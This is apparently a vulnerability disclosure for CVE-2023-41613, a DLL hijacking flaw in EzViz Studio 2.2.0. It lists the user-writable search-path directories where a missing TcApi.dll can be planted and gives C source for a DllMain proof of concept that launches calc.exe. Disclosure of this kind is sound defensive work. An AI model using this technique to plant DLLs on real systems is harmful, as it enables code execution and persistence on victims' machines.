EzViz Studio version 2.2.0 suffers from a dll hijacking vulnerability.
d6647010f93e517c65461fc94e2488783e4a7647feb496353818cb592c2d1194
PoC:
*DLL Hijacking via EzViz Studio (Reported by EAFZ from Pythongoras)*
*Author: EAFZ aka myantti3m*
*CVE: **CVE**-2023-41613.*
*Test Environment:*
OS: Windows 11 Pro 64 bit(10.0, Build 2261)
EzViz Studio version: 2.2.0
*Technical Description *
*1. **Technical Description *
EzvizStudio.exe searches for a DLL called TcApi.dll. Because TcApi.dll
doesn’t exist in any of the paths of the DLL search order. In particular,
some paths have writable permissions for normal users as:
· C:\Users\<Username>\AppData\Local\Programs\Microsoft VS
Code\bin\TcApi.dll
· C:\Users\<Username>\AppData\Local\Microsoft\WindowsApps\TcApi.dll
So we can plant “malicious” TcApi.dll inside these directories and wait
until the application will load it.
*POC*
We created a malicious DLL file (TcApi.dll) and complied it. In our case,
it opens calc.exe. You can see the code below:
#include <windows.h>
#pragma comment (lib, "user32.lib")
#include "pch.h"
#include <iostream>
#include <stdlib.h>
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD nReason, LPVOID lpReserved) {
switch (nReason) {
case DLL_PROCESS_ATTACH:
system("calc.exe");
break;
case DLL_PROCESS_DETACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}
Copy “malicious” TcApi.dll to
C:\Users\<Username>\AppData\Local\Microsoft\WindowsApps\TcApi.dll
If we run the EzVizStudio again, the code from the “malicious” DLL runs